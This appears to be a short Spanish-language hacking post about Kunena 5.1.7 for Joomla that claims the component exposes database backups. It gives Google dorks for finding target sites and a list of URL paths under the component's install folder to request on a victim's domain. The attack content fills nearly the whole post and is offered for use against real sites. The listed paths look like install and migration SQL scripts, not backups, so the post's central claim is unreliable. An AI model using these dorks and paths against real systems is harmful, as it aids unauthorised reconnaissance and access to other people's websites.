Joomla Kunena Components 5.1.7 | Exposición de BackUps de DBs - INTELMEX ERROR 404

Exposición de BackUps de DBs

Vulnerabilidad en Kunena Componets en su versión 5.1.7 de Joomla, expone los backup de las bases de datos.

Explosión de Vulnerabilidad

Para identificar sitios los cuales implementan Kunena tenemos unos Dorks, con los cuales podemos realizar nuestra búsqueda de objetivos.

inurl:''/administrator/components/com_kunena/install/sql/''
inurl:''/index.php?option=com_kunena''
inurl:''/index.php?option=com_kunena&view=topic&catid=''

Con los Dorks anteriores buscamos nuestro objetivo. Ya una vez identificado, utilizaremos uno de los exploits, el cual sol debemos de sustituir en la URL:

https://www.objetivo.com/URL_EXPLOIT

/administrator/components/com_kunena/install/sql/migrate/mysql/kunena.sql
/administrator/components/com_kunena/install/sql/migrate/mysql/fireboard.sql
/administrator/components/com_kunena/install/sql/migrate/mysql/joomlaboard.sql
/administrator/components/com_kunena/install/sql/migrate/mysql/create_tables.utf8.sql
/administrator/components/com_kunena/install/sql/install/mysql/create_tables.utf8.sql
/administrator/components/com_kunena/install/sql/install/mysql/default_ranks.sql
/administrator/components/com_kunena/install/sql/install/mysql/default_smileys.sql
/administrator/components/com_kunena/install/sql/install/mysql/reserved_aliases.sql
/administrator/components/com_kunena/install/sql/updates/mysql/1.0.0-2007-04-15.sql
/administrator/components/com_kunena/install/sql/updates/mysql/2.0.0-2011-10-19.sql
/administrator/components/com_kunena/install/sql/updates/mysql/3.0.3-2013-10-01.sql
/administrator/components/com_kunena/install/sql/updates/mysql/4.0.0-2015-03-26.sql
/administrator/components/com_kunena/install/sql/updates/mysql/5.0.0-2015-12-02.sql
/administrator/components/com_kunena/install/sql/updates/mysql/5.1.6-2018-11-07.sql